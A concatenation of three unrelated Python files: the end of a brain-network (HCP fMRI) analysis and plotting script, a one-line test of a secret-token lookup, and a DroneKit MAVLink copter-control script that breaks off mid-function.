h1.set_xlabel("subjects' participation coefficients")
h1.set_ylabel('nodes')
h1.set_yticklabels(h1.get_yticklabels(),rotation=360)
h1.set_xticks([],[])
# h2=sns.heatmap(arr2, ax=axes[1][0], cbar_ax=axes[1][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
h2=sns.heatmap(arr2, ax=axes[1][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
h2.set_xlabel("subjects' working memory performance")
h2.set_yticks([],[])
h2.set_xticks([],[])
# plt.savefig('task_perf_corr_exp.pdf')
plot_coefs = task_pc_corr[np.argsort(task_pc_corr)[np.linspace(0,task_pc_corr.shape[0]-1,10).astype(int)]]
h3= sns.heatmap(plot_coefs.reshape(10,1),annot=True, fmt='.2f',ax=axes[0][1],cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True))
# h3.set_xlabel("subjects' participation coefficients")
h3.set_ylabel('diversity facilitated\nperformance coefficient')
h3.set_yticklabels(h1.get_yticklabels(),rotation=360)
h3.set_xticks([],[])
axes[1][1].set_visible(False)
plt.savefig('task_perf_corr_exp.pdf')
plt.show()
"""
y = subjects
x = pc
lower x = dfpc
colorbar = features
"""
sns.set(style='white',context="paper",font='Helvetica')
plot_pc_coef_values = subject_pcs[np.argsort(task_pc)[np.linspace(0,task_pc.shape[0]-1,30).astype(int)]][:,np.argsort(task_pc_corr)[np.linspace(0,task_pc_corr.shape[0]-1,10).astype(int)]].transpose()
plot_task_perf = task_pc[np.argsort(task_pc)[np.linspace(0,task_pc.shape[0]-1,30).astype(int)]]
arr1 = plot_pc_coef_values
arr2 = [plot_task_perf,]
fig, axes = plt.subplots(2, 2,gridspec_kw={'height_ratios': [10,1,10,1], 'width_ratios': [10, .5,], 'wspace': 0.25}, sharex='col')
# h1=sns.heatmap(arr1, ax=axes[0][0], cbar_ax=axes[0][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
h1=sns.heatmap(arr1, ax=axes[0][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
h1.set_xlabel("nodes' participation coefficients")
h1.set_ylabel('subjects')
h1.set_yticklabels(h1.get_yticklabels(),rotation=360)
h1.set_xticks([],[])
# h2=sns.heatmap(arr2, ax=axes[1][0], cbar_ax=axes[1][1],cmap=sns.diverging_palette(220, 10, sep=80, n=7,as_cmap=True),square=True)
h2=sns.heatmap(arr2, ax=axes[1][0], cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True),square=True)
h2.set_xlabel("nodes' diversity facilitated performance coefficients")
h2.set_yticks([],[])
h2.set_xticks([],[])
# plt.savefig('task_perf_corr_exp.pdf')
plot_coefs = task_pc[np.argsort(task_pc)[np.linspace(0,task_pc.shape[0]-1,10).astype(int)]]
h3= sns.heatmap(plot_coefs.reshape(10,1),annot=True, fmt='.2f',ax=axes[0][1],cbar=False,cmap=sns.diverging_palette(220, 10, sep=80, n=100,as_cmap=True))
# h3.set_xlabel("subjects' participation coefficients")
h3.set_ylabel('diversity feature for model')
h3.set_yticklabels(h1.get_yticklabels(),rotation=360)
h3.set_xticks([],[])
axes[1][1].set_visible(False)
plt.savefig('feature_exp.pdf')
plt.show()
t = 0
return_features = True
use_matrix = True
task_matrices = matrices
fit_mask = np.ones((subject_pcs.shape[0])).astype(bool)
fit_mask[t] = False
if use_matrix == True:
flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
for s in range(subject_pcs.shape[0]):
m = task_matrices[s]
flat_matrices[s] = m[np.tril_indices(264,-1)]
perf_edge_corr = generate_correlation_map(task_perf[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
perf_edge_scores = np.zeros((subject_pcs.shape[0]))
for s in range(subject_pcs.shape[0]):
perf_edge_scores[s] = pearsonr(flat_matrices[s],perf_edge_corr)[0]
flat_matrices = np.zeros((subject_pcs.shape[0],len(np.tril_indices(264,-1)[0])))
for s in range(subject_pcs.shape[0]):
m = rest_matrices[s]
flat_matrices[s] = m[np.tril_indices(264,-1)]
rest_perf_edge_corr = generate_correlation_map(task_perf[fit_mask].reshape(1,-1),flat_matrices[fit_mask].transpose())[0]
rest_perf_edge_scores = np.zeros((subject_pcs.shape[0]))
for s in range(subject_pcs.shape[0]):
rest_perf_edge_scores[s] = pearsonr(flat_matrices[s],rest_perf_edge_corr)[0]
perf_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(subject_pcs.shape[1]):
perf_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_pcs[fit_mask,i])[0]
perf_wmd_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_wmds.shape[1]):
perf_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],subject_wmds[fit_mask,i])[0]
mod_pc_corr = np.zeros(subject_pcs.shape[1])
for i in range(subject_pcs.shape[1]):
mod_pc_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_pcs[fit_mask,i])[0]
mod_wmd_corr = np.zeros(subject_wmds.shape[1])
for i in range(subject_wmds.shape[1]):
mod_wmd_corr[i] = nan_pearsonr(task_perf[fit_mask],rest_subject_wmds[fit_mask,i])[0]
task_pc = np.zeros(subject_pcs.shape[0])
task_wmd = np.zeros(subject_pcs.shape[0])
for s in range(subject_pcs.shape[0]):
task_pc[s] = nan_pearsonr(subject_pcs[s],perf_pc_corr)[0]
task_wmd[s] = nan_pearsonr(subject_wmds[s],perf_wmd_corr)[0]
rest_pc = np.zeros(subject_pcs.shape[0])
rest_wmd = np.zeros(subject_pcs.shape[0])
for s in range(subject_pcs.shape[0]):
rest_pc[s] = nan_pearsonr(rest_subject_pcs[s],mod_pc_corr)[0]
rest_wmd[s] = nan_pearsonr(rest_subject_wmds[s],mod_wmd_corr)[0]
if use_matrix == True:
pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,rest_perf_edge_scores,perf_edge_scores,rest_subject_mods,subject_mods]).transpose()
# neurons = (8,8,8,)
neurons = (8,12,8,12)
elif use_matrix == False:
pvals = np.array([rest_pc,rest_wmd,task_pc,task_wmd,rest_subject_mods,subject_mods]).transpose()
# neurons = (6,6,6,)
neurons = (6,9,6,9)
train = np.ones(len(pvals)).astype(bool)
train[t] = False
model = MLPRegressor(solver='lbfgs',hidden_layer_sizes=neurons,alpha=1e-5,random_state=t)
model.fit(pvals[train],task_perf[train])
result = model.predict(pvals[t].reshape(1, -1))[0]
import igraph
model_array = np.array(model.coefs_)
n_nodes = np.sum(neurons)
model_network = np.zeros((n_nodes,n_nodes))
g = igraph.Graph()
vertex = 0
# model_array[model_array<0] = 0.0
neurons = [8,8,12,8,12]
pos = [-4,-4,-6,-4,-6]
for l in range(5):
for n in range(neurons[l]):
g.add_vertex(vertex,**{'layer':l,'neuron':n+pos[l]})
vertex = vertex + 1
g.add_vertex(vertex+1,**{'layer':l+1,'neuron':3})
for l in range(4):
i_off = int(np.sum(neurons[:l]))
j_off = int(np.sum(neurons[:l+1]))
print i_off,j_off
for i in range(neurons[l]):
for j in range(neurons[l+1]):
if model_array[l][i,j] > 0: d = 'pos'
else: d = 'neg'
g.add_edge(int(i+i_off),int(j+j_off),weight=abs(model_array[l][i,j]),**{'direction':d})
for i in range(12):
if model.coefs_[-1][i] > 0: d = 'pos'
else: d = 'neg'
g.add_edge(i+36,48,weight=abs(model.coefs_[-1][i]),**{'direction':d})
g.write_gml('neural_network_new.gml')
def plot(df,savestr,colormap='coolwarm'):
behavior_df = df
tasks = np.unique(behavior_df.Task.values)
behavior_df['Prediction Accuracy'] = behavior_df['Prediction Accuracy'].values.astype(float)
behavior_df['colors'] = make_heatmap(behavior_df['Prediction Accuracy'].values,colormap,-.3,.3)
norm_behavior_df = behavior_df.copy()
for task in behavior_df['Task'].values:
norm_behavior_df['Prediction Accuracy'][norm_behavior_df['Task']==task] = scipy.stats.zscore(norm_behavior_df['Prediction Accuracy'][norm_behavior_df['Task']==task].values)
for measure in behavior_df['Behavioral Measure'].values:
norm_behavior_df['Prediction Accuracy'][norm_behavior_df['Behavioral Measure']==measure] = scipy.stats.zscore(norm_behavior_df['Prediction Accuracy'][norm_behavior_df['Behavioral Measure']==measure].values)
norm_behavior_df['colors'] = make_heatmap(norm_behavior_df['Prediction Accuracy'].values,colormap,-1.5,1.5)
left, width = 0, 1
bottom, height = 0, 1
right = left + width
top = bottom + height
top = top /2.
fig = plt.figure(figsize=(mm_2_inches(183),mm_2_inches(247)))
for col,task in zip(np.linspace(.135,.865,4),tasks):
order = behavior_df[behavior_df.Task==task]['Behavioral Measure'].values[np.argsort(behavior_df[behavior_df.Task==task]['Prediction Accuracy'].values)]
scores = behavior_df[behavior_df.Task==task]['Prediction Accuracy'].values[np.argsort(behavior_df[behavior_df.Task==task]['Prediction Accuracy'].values)]
pvals = behavior_df[behavior_df.Task==task]['p'].values[np.argsort(behavior_df[behavior_df.Task==task]['Prediction Accuracy'].values)].astype(float)
for ix,o in enumerate(order):
if float(scores[ix]) < 0.0:
s = '-' + str(scores[ix])[1:5]
order[ix] = order[ix] + ' (%s)'%(s)
continue
s = str(scores[ix])[1:4]
order[ix] = order[ix] + ' (%s)'%(s)
order = np.append(order,task.capitalize())
colors = norm_behavior_df[norm_behavior_df.Task==task]['colors'].values[np.argsort(norm_behavior_df[norm_behavior_df.Task==task]['Prediction Accuracy'].values)]
# colors = norm_behavior_df[norm_behavior_df.Task==task]['colors'].values[np.argsort(norm_behavior_df[norm_behavior_df.Task==task]['Prediction Accuracy'].values)]
colors = list(colors)
colors.append((0,0,0))
pvals = np.append(pvals,1)
locs = (np.arange(len(order)+1)/float(len(order)+1))[1:]
for i,t,c,p in zip(locs,order,colors,pvals):
if t == 'Wm': t = 'Working Memory'
if p < (.05 / len(colors)):
t = t + " *"
fig.text(col*(left+right), float(i)*(bottom+top), t,horizontalalignment='center',verticalalignment='center',fontsize=7, color=c)
sns.plt.savefig('%s.pdf'%(savestr))
sns.plt.show()
def small_tstatfunc(x, y,bc=False):
t, p = scipy.stats.ttest_ind(x,y)
if p < 1e-5: pst = '*!'
elif p < .05: pst = '*'
else: pst = None
if pst == None: return "%s" %(np.around(t,3))
else: return "%s \n p%s" %(np.around(t,3),p)
def plot_box(data,x,y,split_names,savestr,colors):
data['Node Type'] = np.zeros(len(data)).astype(str)
data.Task = data.Task.str.capitalize()
for task in data.Task.values:
metric= data[x][data.Task==task].values
cut_off = np.percentile(metric,80)
c = np.zeros(len(metric)).astype(str)
c[metric >= cut_off] = split_names[0]
c[metric < cut_off] = split_names[1]
data['Node Type'][data.Task==task] = c
sns.set(context="paper",font='Helvetica',style="white",font_scale=1.5)
ax = sns.boxplot(data=data,x='Task',y=y,hue='Node Type',hue_order=split_names,palette=colors)
for t in np.unique(data.Task.values):
tdf = data[data.Task==t]
print t, scipy.stats.ttest_ind(tdf[y][tdf['Node Type']==split_names[0]].values,tdf[y][tdf['Node Type']==split_names[1]].values)
# maxvaly = np.mean(tdf[y]) + (np.std(tdf[y]) * .5)
# sns.plt.text(i,maxvaly,stat,ha='center',color='black',fontsize=sns.plotting_context()['font.size'])
sns.plt.tight_layout()
sns.plt.savefig(savestr)
sns.plt.close()
# performance_across_tasks()
# connectivity_across_tasks()
# plot(pd.read_csv('/home/despoB/mb3152/dynamic_mod/feature_behav_predict.csv'),'feature_behav_predict','Reds')
# plot(pd.read_csv('/home/despoB/mb3152/dynamic_mod/feature_corr.csv'),'feature_corr','RdBu_r')
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='scrub_.2',control_com=False,control_motion=False,use_matrix=False)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='scrub_.2',control_com=False,control_motion=False,use_matrix=True)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False,use_matrix=False)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False,use_matrix=True)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=True,use_matrix=False)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=True,use_matrix=True)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=True,control_motion=False,use_matrix=True)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=True,control_motion=False,use_matrix=False)
# performance_across_traits(tasks = [str(sys.argv[1])])
# performance_across_traits(tasks = ['RELATIONAL'])
df = pd.DataFrame()
for task in ['WM','RELATIONAL','LANGUAGE','SOCIAL']:
df = df.append(pd.read_csv('feature_corr_%s.csv'%(task),usecols=[1,2,3,4]))
# qsub -pe threaded 20 -binding linear:20 -V -l mem_free=20G -j y -o /home/despoB/mb3152/dynamic_mod/sge/ -e /home/despoB/mb3152/dynamic_mod/sge/ -N 'pred' hcp_perf2.py
"""
PRETTY FIGURES
"""
# loo_df = pd.read_csv('/home/despoB/mb3152/dynamic_mod/loo_df.csv')
# df = pd.read_csv('/home/despoB/mb3152/dynamic_mod/df.csv')
# plot_results(loo_df,'Predicted Performance','Performance','/home/despoB/mb3152/dynamic_mod/figures/Predicted_Performance_%s_%s.pdf'%(run_version,control_motion))
# plot_results(df,'PCxPerformance','PC','/home/despoB/mb3152/dynamic_mod/figures/PC_PC_Performance.pdf')
# plot_results(df,'PCxPerformance','PCxModularity','/home/despoB/mb3152/dynamic_mod/figures/PC_Modularity_PC_Performance.pdf')
# plot_results(df,'WCDxPerformance','WCD','/home/despoB/mb3152/dynamic_mod/figures/WCD_WCD_Performance.pdf')
# plot_results(df,'WCDxPerformance','WCDxModularity','/home/despoB/mb3152/dynamic_mod/figures/WCD_Modularity_PC_Performance.pdf')
# pc_df,wmd_df = connectivity_across_tasks(atlas='power',project='hcp',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz_wc',control_com=False,control_motion=False)
# pc_df['Mean Participation Coefficient'] = pc_df['Mean Participation Coefficient'].astype(float)
# pc_df['Diversity Facilitated Modularity Coefficient'] = pc_df['Diversity Facilitated Modularity Coefficient'].astype(float)
# colors = np.array(sns.color_palette("cubehelix", 8))[np.array([6,7])]
# plot_box(pc_df,'Mean Participation Coefficient','Diversity Facilitated Modularity Coefficient',['Connector Hub','Other Node'],savestr='dfmc_cutoff.pdf',colors=colors)
# wmd_df['Mean Within-Community-Strength'] = wmd_df['Mean Within-Community-Strength'].astype(float)
# wmd_df['Locality Facilitated Modularity Coefficient'] = wmd_df['Locality Facilitated Modularity Coefficient'].astype(float)
# colors = np.array(sns.color_palette("cubehelix", 8))[np.array([5,7])]
# plot_box(wmd_df,'Mean Within-Community-Strength','Locality Facilitated Modularity Coefficient',['Local Hub','Other Node'],savestr='lfmc_cutoff.pdf',colors=colors)
# pc_df,wmd_df = performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False,use_matrix=True,return_df=True)
# pc_df['Mean Participation Coefficient'] = pc_df['Mean Participation Coefficient'].astype(float)
# pc_df['Diversity Facilitated Performance Coefficient'] = pc_df['Diversity Facilitated Performance Coefficient'].astype(float)
# colors = np.array(sns.color_palette("cubehelix", 8))[np.array([6,7])]
# plot_box(pc_df,'Mean Participation Coefficient','Diversity Facilitated Performance Coefficient',['Connector Hub','Other Node'],savestr='dfpc_cutoff.pdf',colors=colors)
# wmd_df['Mean Within-Community-Strength'] = wmd_df['Mean Within-Community-Strength'].astype(float)
# wmd_df['Locality Facilitated Performance Coefficient'] = wmd_df['Locality Facilitated Performance Coefficient'].astype(float)
# colors = np.array(sns.color_palette("cubehelix", 8))[np.array([5,7])]
# plot_box(wmd_df,'Mean Within-Community-Strength','Locality Facilitated Performance Coefficient',['Local Hub','Other Node'],savestr='lfpc_cutoff.pdf',colors=colors)
# plot_connectivity_results(pc_df,'Diversity Facilitated Modularity Coefficient','Mean Participation Coefficient','/home/despoB/mb3152/dynamic_mod/figures/pc_pc_w_c.pdf')
# wmd_df['Mean Within-Community-Strength'] = wmd_df['Mean Within-Community-Strength'].astype(float)
# wmd_df['Locality Facilitated Modularity Coefficient'] = wmd_df['Locality Facilitated Modularity Coefficient'].astype(float)
# plot_connectivity_results(wmd_df,'Locality Facilitated Modularity Coefficient','Mean Within-Community-Strength','/home/despoB/mb3152/dynamic_mod/figures/wmd_wmd_q_c.pdf')
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=False)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='fz',control_com=False,control_motion=True)
# performance_across_tasks(atlas='power',tasks=['WM','RELATIONAL','LANGUAGE','SOCIAL'],run_version='scrub_.2',control_com=False,control_motion=False)
# performance_across_tasks()
# performance_across_traits()
# if len(sys.argv) > 1:
# if sys.argv[1] == 'perf':
# performance_across_tasks()
# if sys.argv[1] == 'forever':
# a = 0
# while True:
# a = a - 1
# a = a + 1
# if sys.argv[1] == 'pc_edge_corr':
# task = sys.argv[2]
# atlas = 'power'
# subjects = np.array(hcp_subjects).copy()
# subjects = list(subjects)
# subjects = remove_missing_subjects(subjects,task,atlas)
# static_results = graph_metrics(subjects,task,atlas)
# subject_pcs = static_results['subject_pcs']
# matrices = static_results['matrices']
# pc_edge_corr = pc_edge_correlation(subject_pcs,matrices,path='/home/despoB/mb3152/dynamic_mod/results/hcp_%s_power_pc_edge_corr_z.npy' %(task))
# if sys.argv[1] == 'graph_metrics':
# # subjects = remove_missing_subjects(list(np.array(hcp_subjects).copy()),sys.argv[2],sys.argv[3])
# # subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',sys.argv[2],sys.argv[3]))
# # graph_metrics(subjects,task=sys.argv[2],atlas=sys.argv[3],run_version='fz_wc',run=True)
# subjects = []
# dirs = os.listdir('/home/despoB/connectome-data/')
# for s in dirs:
# try: int(s)
# except: continue
# subjects.append(str(s))
# graph_metrics(subjects,task=sys.argv[2],atlas=sys.argv[3],run_version='HCP_900',run=True)
# if sys.argv[1] == 'make_matrix':
# subject = str(sys.argv[2])
# task = str(sys.argv[3])
# atlas = str(sys.argv[4])
# make_static_matrix(subject,task,'hcp',atlas)
# if sys.argv[1] == 'calc_motion':
# subject = str(sys.argv[2])
# task = str(sys.argv[3])
# run_fd(subject,task)
# if sys.argv[1] == 'check_norm':
# atlas = sys.argv[3]
# task = sys.argv[2]
# # subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',sys.argv[2],sys.argv[3]))
# subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_scrub_.2.npy' %('hcp',sys.argv[2],sys.argv[3]))
# check_scrubbed_normalize(subjects,task,atlas='power')
# print 'done checkin, all good!'
# if sys.argv[1] == 'mediation':
# local_mediation(sys.argv[2])
# if sys.argv[1] == 'alg_compare':
# subjects = []
# dirs = os.listdir('/home/despoB/connectome-data/')
# for s in dirs:
# try: int(s)
# except: continue
# subjects.append(str(s))
# # alg_compare(subjects)
|
### Test for secrets.py
# Should return length of secret token
from functions import getSecret
def test_secrets():
access_token = getSecret('twitter-rob')
assert (len(access_token)) |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
######################################################
## Sending control commands to AP via MAVLink ##
## Based on set_attitude_target.py: https://github.com/dronekit/dronekit-python/blob/master/examples/set_attitude_target/set_attitude_target.py
######################################################
## Additional installation for SITL:
## pip3 install dronekit-sitl -UI
from dronekit import connect, VehicleMode, LocationGlobal, LocationGlobalRelative
from pymavlink import mavutil # Needed for command message definitions
import time
import math
# Set MAVLink protocol to 2.
import os
os.environ["MAVLINK20"] = "1"
import sys
#######################################
# Parameters
#######################################
rc_control_channel = 6 # Channel to check value, start at 0 == chan1_raw
rc_control_thres = 2000 # Values to check
#######################################
# Global variables
#######################################
rc_channel_value = 0
vehicle = None
#######################################
# User input
#######################################
# Set up option parsing to get connection string
import argparse
parser = argparse.ArgumentParser(description='Example showing how to set and clear vehicle channel-override information.')
parser.add_argument('--connect',
help="vehicle connection target string. If not specified, SITL automatically started and used.")
args = parser.parse_args()
#######################################
# Functions
#######################################
connection_string = args.connect
sitl = None
# Start SITL if no connection string specified
if not connection_string:
import dronekit_sitl
sitl = dronekit_sitl.start_default()
connection_string = sitl.connection_string()
print('Connecting to vehicle on: %s' % connection_string)
vehicle = connect(connection_string, wait_ready=True)
@vehicle.on_message('RC_CHANNELS')
def RC_CHANNEL_listener(vehicle, name, message):
global rc_channel_value, rc_control_channel
# TO-DO: find a less hard-coded solution
curr_channels_values = [message.chan1_raw, message.chan2_raw, message.chan3_raw, message.chan4_raw, message.chan5_raw, message.chan6_raw, message.chan7_raw, message.chan8_raw]
rc_channel_value = curr_channels_values[rc_control_channel]
# # Print out the values to debug
# print('%s attribute is: %s' % (name, message)) # Print all info from the messages
# os.system('clear') # This helps in displaying the messages to be more readable
# for channel in range(8):
# print("Number of RC channels: ", message.chancount, ". Individual RC channel value:")
# print(" CH", channel, curr_channels_values[channel])
def arm_and_takeoff_nogps(aTargetAltitude):
"""
Arms vehicle and fly to aTargetAltitude without GPS data.
"""
print("Basic pre-arm checks")
# Don't let the user try to arm until autopilot is ready
# If you need to disable the arming check,
# just comment it with your own responsibility.
while not vehicle.is_armable:
print("- Waiting for vehicle to initialise...")
time.sleep(1)
print("Arming motors")
# Copter should arm in GUIDED_NOGPS mode
vehicle.mode = VehicleMode("LOITER")
vehicle.armed = True
while not vehicle.armed:
print("- Waiting for arming...")
time.sleep(1)
print("Taking off!")
vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude
# Wait until the vehicle reaches a safe height before processing the goto
# (otherwise the command after Vehicle.simple_takeoff will execute
# immediately).
while True:
print(" Altitude: ", vehicle.location.global_relative_frame.alt)
# Break and return from function just below target altitude.
if vehicle.location.global_relative_frame.alt >= aTargetAltitude * 0.95:
print("Reached target altitude")
break
time.sleep(1)
def send_attitude_target(roll_angle = 0.0, pitch_angle = 0.0,
yaw_angle = None, yaw_rate = 0.0, use_yaw_rate = False,
thrust = 0.5):
"""
use_yaw_rate: the yaw can be controlled using yaw_angle OR yaw_rate.
When one is used, the other is ignored by Ardupilot.
thrust: 0 <= thrust <= 1, as a fraction of maximum vertical thrust.
Note that as of Copter 3.5, thrust = 0.5 triggers a special case in
the code for maintaining current altitude.
"""
if yaw_angle is None:
# this value may be unused by the vehicle, depending on use_yaw_rate
yaw_angle = vehicle.attitude.yaw
# Thrust > 0.5: Ascend
# Thrust == 0.5: Hold the altitude
# Thrust < 0.5: Descend
msg = vehicle.message_factory.set_attitude_target_encode(
0, # time_boot_ms
1, # Target system
1, # Target component
0b00000000 if use_yaw_rate else 0b00000100,
to_quaternion(roll_angle, pitch_angle, yaw_angle), # Quaternion
0, # Body roll rate in radian
0, # Body pitch rate in radian
math.radians(yaw_rate), # Body yaw rate in radian/second
thrust # Thrust
)
vehicle.send_mavlink(msg)
def send_ned_velocity(velocity_x, velocity_y, velocity_z, duration):
"""
Move vehicle in direction based on specified velocity vectors.
"""
msg = vehicle.message_factory.set_position_target_local_ned_encode(
0, # time_boot_ms (not used)
0, 0, # target system, target component
mavutil.mavlink.MAV_FRAME_LOCAL_NED, # frame
0b0000111111000111, # type_mask (only speeds enabled)
0, 0, 0, # x, y, z positions (not used)
velocity_x, velocity_y, velocity_z, # x, y, z velocity in m/s
0, 0, 0, # x, y, z acceleration (not supported yet, ignored in GCS_Mavlink)
0, 0) # yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)
# send command to vehicle on 1 Hz cycle
for x in range(0,duration):
vehicle.send_mavlink(msg)
time.sleep(1)
def goto_position_target_local_ned(north, east, down):
"""
Send SET_POSITION_TARGET_LOCAL_NED command to request the vehicle fly to a specified
location in the North, East, Down frame.
"""
msg = vehicle.message_factory.set_position_target_local_ned_encode(
0, # time_boot_ms (not used)
0, 0, # target system, target component
mavutil.mavlink.MAV_FRAME_LOCAL_NED, # frame
0b0000111111111000, # type_mask (only positions enabled)
north, east, down,
0, 0, 0, # x, y, z velocity in m/s (not used)
0, 0, 0, # x, y, z acceleration (not supported yet, ignored in GCS_Mavlink)
0, 0) # yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)
# send command to vehicle
vehicle.send_mavlink(msg)
def set_attitude(roll_angle = 0.0, pitch_angle = 0.0,
yaw_angle = None, yaw_rate = 0.0, use_yaw_rate = False,
thrust = 0.5, duration = 0):
"""
Note that from AC3.3 the message should be re-sent more often than every
second, as an ATTITUDE_TARGET order has a timeout of 1s.
In AC3.2.1 and earlier the specified attitude persists until it is canceled.
The code below should work on either version.
Sending the message multiple times is the recommended way.
"""
send_attitude_target(roll_angle, pitch_angle,
yaw_angle, yaw_rate, False,
thrust)
start = time.time()
while time.time() - start < duration:
send_attitude_target(roll_angle, pitch_angle,
yaw_angle, yaw_rate, False,
thrust)
time.sleep(0.1)
# Reset attitude, or it will persist for 1s more due to the timeout
send_attitude_target(0, 0,
0, 0, True,
thrust)
def to_quaternion(roll = 0.0, pitch = 0.0, yaw = 0.0):
"""
Convert degrees to quaternions
"""
t0 = math.cos(math.radians(yaw * 0.5))
t1 = math.sin(math.radians(yaw * 0.5))
t2 = math.cos(math.radians(roll * 0.5))
t3 = math.sin(math.radians(roll * 0.5))
t4 = math.cos(math.radians(pitch * 0.5))
t5 = math.sin(math.radians(pitch * 0.5))
w = t0 * t2 * t4 + t1 * t3 * t5
x = t0 * t3 * t4 - t1 * t2 * t5
y = t0 * t2 * t5 + t1 * t3 * t4
z = t1 * t2 * t4 - t0 * t3 * t5
return [w, x, y, z]
"""
Convenience functions for sending immediate/guided mode commands to control the Copter.
The set of commands demonstrated here include:
* MAV_CMD_CONDITION_YAW - set direction of the front of the Copter (latitude, longitude)
* MAV_CMD_DO_SET_ROI - set direction where the camera gimbal is aimed (latitude, longitude, altitude)
* MAV_CMD_DO_CHANGE_SPEED - set target speed in metres/second.
The full set of available commands are listed here:
http://dev.ardupilot.com/wiki/copter-commands-in-guided-mode/
"""
def condition_yaw(heading, relative=False):
"""
Send MAV_CMD_CONDITION_YAW message to point vehicle at a specified heading (in degrees).
This method sets an absolute heading by default, but you can set the `relative` parameter
to `True` to set yaw relative to the current yaw heading.
By default the yaw of the vehicle will follow the direction of travel. After setting
the yaw using this function there is no way to return to the default yaw "follow direction
of travel" behaviour (https://github.com/diydrones/ardupilot/issues/2427)
For more information see:
http://copter.ardupilot.com/wiki/common-mavlink-mission-command-messages-mav_cmd/#mav_cmd_condition_yaw
"""
if relative:
is_relative = 1 #yaw relative to direction of travel
else:
is_relative = 0 #yaw is an absolute angle
# create the CONDITION_YAW command using command_long_encode()
msg = vehicle.message_factory.command_long_encode(
0, 0, # target system, target component
mavutil.mavlink.MAV_CMD_CONDITION_YAW, #command
0, #confirmation
heading, # param 1, yaw in degrees
0, # param 2, yaw speed deg/s
1, # param 3, direction -1 ccw, 1 cw
is_relative, # param 4, relative offset 1, absolute angle 0
0, 0, 0) # param 5 ~ 7 not used
# send command to vehicle
vehicle.send_mavlink(msg)
def pos_control_align_north_and_move_square():
print("SQUARE path using SET_POSITION_TARGET_LOCAL_NED and position parameters")
DURATION_SEC = 2 #Set duration for each segment.
HEIGHT_M = 2
SIZE_M = 2
"""
Fly the vehicle in a SIZE_M meter square path, using the SET_POSITION_TARGET_LOCAL_NED command
and specifying a target position (rather than controlling movement using velocity vectors).
The command is called from goto_position_target_local_ned() (via `goto`).
The position is specified in terms of the NED (North East Down) relative to the Home location.
WARNING: The "D" in NED means "Down". Using a positive D value will drive the vehicle into the ground!
The code sleeps for a time (DURATION_SEC) to give the vehicle time to reach each position (rather than
sending commands based on proximity).
The code also sets the region of interest (MAV_CMD_DO_SET_ROI) via the `set_roi()` method. This points the
camera gimbal at the the selected location (in this case it aligns the whole vehicle to point at the ROI).
"""
print("Yaw 0 absolute (North)")
condition_yaw(0)
print("North (m): ", SIZE_M, ", East (m): 0m, Height (m):", HEIGHT_M," for", DURATION_SEC, "seconds")
goto_position_target_local_ned(SIZE_M, 0, -HEIGHT_M)
time.sleep(DURATION_SEC)
print("Yaw 90 absolute (East)")
condition_yaw(90)
print("North (m): ", SIZE_M, ", East (m): ", SIZE_M, " Height (m):", HEIGHT_M," for", DURATION_SEC, "seconds")
goto_position_target_local_ned(SIZE_M, SIZE_M, -HEIGHT_M)
time.sleep(DURATION_SEC)
print("Yaw 180 absolute (South)")
condition_yaw(180)
print("North (m): 0m, East (m): ", SIZE_M, ", Height (m):", HEIGHT_M," for", DURATION_SEC, "seconds")
goto_position_target_local_ned(0, SIZE_M, -HEIGHT_M)
time.sleep(DURATION_SEC)
print("Yaw 270 absolute (West)")
condition_yaw(270)
print("North (m): 0m, East (m): 0m, Height (m):", HEIGHT_M," for", DURATION_SEC, "seconds")
goto_position_target_local_ned(0, 0, -HEIGHT_M)
time.sleep(DURATION_SEC)
def vel_control_align_north_and_move_square():
"""
Fly the vehicle in a path using velocity vectors (the underlying code calls the
SET_POSITION_TARGET_LOCAL_NED command with the velocity parameters enabled).
The thread sleeps for a time (DURATION) which defines the distance that will be travelled.
